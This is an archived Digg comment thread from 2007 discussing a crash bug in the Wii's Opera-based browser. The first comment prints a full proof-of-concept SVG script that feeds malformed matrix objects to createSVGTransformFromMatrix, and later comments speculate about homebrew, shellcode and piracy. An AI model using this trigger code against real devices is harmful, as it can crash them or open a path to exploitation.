What is Digg?Sponsored by Sony Pictures
Adam Lambert sings the 2012 theme song, “Time for Miracles” view!
whowillsurvive2012.com - Watch the Adam Lambert music video for the 2012 theme song. See 2012, in theaters Nov 13
42 Comments
- lbradeen, on 10/12/2007, -0/+17I'm hosting this from home so in case it goes down the relevant code used is this.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg id="mySVG" width="100%" height="100%" version="1.1"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:1;
stroke:rgb(0,0,0)"/>
<script>
var svg = document.getElementById("mySVG");
var matrix = svg.createSVGMatrix();
var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};
try{
svg.createSVGTransformFromMatrix(matrix);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(randomObject);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(null);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(i);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(new Array(i));
}catch(e){}
</script>
</svg> - Guard, on 10/12/2007, -1/+15"Don't update your Wii's any time soon!!!"
Doesn't matter if you update your Wii. Wii Browser is a download from the Wii Shop and is not part of any system update. - unloud, on 10/12/2007, -1/+14It's all text; I'm sure he'll be fine.
- saunderez, on 10/12/2007, -0/+13If I knew how the hell this worked I'd so be trying some code injection right now...
- Protoss, on 10/12/2007, -0/+12Well right now, I think everyone is just hoping for a Hello World :P
- barktwiggs, on 10/12/2007, -0/+10Opera has already patched this vulnerability with it's 9.10 version. All they need to do is port it to the Wii and it's fixed, whenever that will be. Lets see what type of sploitz happen in the meantime though.
- Protoss, on 10/12/2007, -0/+10Looks like a hopeful start to Wii homebrew apps, or at least a way to run code.
- dralezero, on 10/12/2007, -0/+9Was wondering what he meant by that.
- seanthebond, on 10/12/2007, -2/+11I can guarantee that if you're hosting this from home, and this gets on the front page, its going down.
- lemur33, on 10/12/2007, -0/+9omy god that is fantabulous
- larholm, on 10/12/2007, -1/+9I created the above proof-of-concept code for lbradeen in an IRC session, #Javascript on EfNet. It's very loosely based on the iDefense advisory which mentions that an improper matrix object allows you to manipulate the virtual function pointers.
Just leaving a comment so that lbradeen has my contact ;)
Regards
Thor Larholm - ascott9, on 10/12/2007, -0/+7it's on the frontpage and going strong right now. It actually loaded faster than almost any site ever loads from the digg homepage. Just text or not he must have a good connection.
- timelf123, on 10/12/2007, -2/+6nice find!
- lhnz, on 10/12/2007, -0/+3It's like a thread that you can pull and the rest will unravel.
- Araya213, on 10/12/2007, -0/+3Hopefully by then we'll all have custom firmware in our Wiis.
- TheTjalian, on 10/12/2007, -0/+2This'll be more for homebrewers then actual hackers, which is good. I can't wait to see hello world ported :)
- DonkeyBeliever, on 10/12/2007, -0/+2Just tested it on my Wii, it works great, had to do a hard reset though :P
- FaT32, on 10/12/2007, -1/+3BTW, Opera for Wii is still beta software. So, they probably will path it...
Don't worry about Opera's security, guys very care about it. - FreePlayPSP, on 10/12/2007, -0/+2I'm not sure how much is known about the Wii's architecture, so I'm not sure how viable it will be to run our own unsigned code through this. Not to mention that Opera seems to run in a sort of sandbox - I've Lastmeasured my Wii to the point that the browser was 100% unresponsive but the Home button still worked just fine. Haven't tested this out yet, though, so it's possible that this 'breaks' the sandbox.
Nice PoC, lbradeen and larholm. Question, though: is this an actual overflow, or just an out-of-memory glitch from trying to create an array with 0xFFFFFFFF members? I don't know much about how Opera handles memory in its Javascript handler, or if 0xFFFFFFFF means -1 or 4294967295 for Javascript in general. I assume that shoving this function into createSVGTransformFromMatrix simply bypasses some sort of memory limitation check. Is this really usable to run unsigned code, or just to crash the system? - Onikun, on 10/12/2007, -0/+2Just keep setting your clock back on your wii and the trial might not expire?
- DonkeyBeliever, on 10/12/2007, -0/+2Also note that this Internet Channel "Trial" expires sometime this year, so even if we have a succesful exploit we won't have it for long...
- mageofdeath, on 10/12/2007, -0/+2we'll have the exploit as long as we want it, so long as we don't update anything, and in case you think updates are necessary for playing new games; it just isn't the case anymore as the psp has demonstrated a good exploit allowing unsigned code can have all kinds of workarounds...
- lhnz, on 10/12/2007, -0/+1That's true. I guess the first use has to be getting it to disable the trial to give more time! haha :D
- mageofdeath, on 10/12/2007, -0/+1why not, some of the vista and xp hacks worked this way, and who says they'll make it expire, from what I hear that's when the full version will be released, ie not an upgrade...
- dontlookdown, on 10/12/2007, -0/+1So I don't really understand this. What does this do?
- mattcoxonline, on 10/12/2007, -0/+1Also, the current version is a DEMO, or beta, if you will - and that's why people can acquire it for free.
The full version, no doubt, will fix bugs like this; and have a few extra features. - LordSturm, on 10/12/2007, -0/+1Giddy up FreePlay!
:P - Hopefully this leads to some enjoyment, and that enjoyment doesn't have an inevitable end in March. - ramunas, on 10/12/2007, -0/+1Yup, I wouldn't worry about this.
- wolkengrau, on 10/12/2007, -0/+1Just put the Internet-Channel on a SD-card.
That works, too. - moofree, on 10/12/2007, -0/+1Yeah right. That's why there's no Gamecube Homebrew.
And no software was ever coded for macs when they were ppc. None. - Shirokun, on 10/12/2007, -1/+1Homebrew and stuff, if all goes well.
- Dood77, on 10/12/2007, -1/+1So, i dont see how crashing a console will let you run unsigned code, not that i think its impossible i've seen it done before, i just want to know how it works. Do you give it a command before/after the buffer overflow to read data from somewhere to execute or something?
- lbradeen, on 10/12/2007, -0/+0I'll have to go through the apache logs today to see how many pages it served but I'm pretty impressed it stayed up. it's running on a xen vm w/ 256mb ram 25% of which is being wasted by my mail server that's already on there.
- KungFuJesus, on 10/12/2007, -1/+1um, they would have to write shell code for PPC, which crackers pretty much don't cause risc is a bitch and not many people have PPC
- NOPx86, on 10/12/2007, -0/+0YAYYYYYYYY FreePlay is here to HAXORZZ FTW!!!!!!!! :p
- bluraven64, on 10/12/2007, -4/+3If it allows execution of unsigned code, it could lead to ALOT of things.
- mageofdeath, on 10/12/2007, -4/+1here's to hoping for a good n64 emulator, or wii or gc backups!!!
- pintong, on 10/12/2007, -5/+1For the uninformed readers, this is *good news*
- theratdotus, on 10/12/2007, -8/+2wat sploitz would be possible in theory? transfering media from net to sd? channel hacks? or just more porn?
- doshindude, on 10/12/2007, -12/+5um.
yeah.
who cares. - Simon80, on 10/12/2007, -9/+2That would be very, very sad, and highly unlikely, I think.
- inactive, on 10/12/2007, -13/+1What's it running? Win XP? Also, it doesn't affect Firefox.
The Digg Toolbar for Firefox lets you Digg, submit content, and keep track of Digg even when you're not on the Digg site. Download the official 
© Digg Inc. 2009
— Content created and posted by Digg users is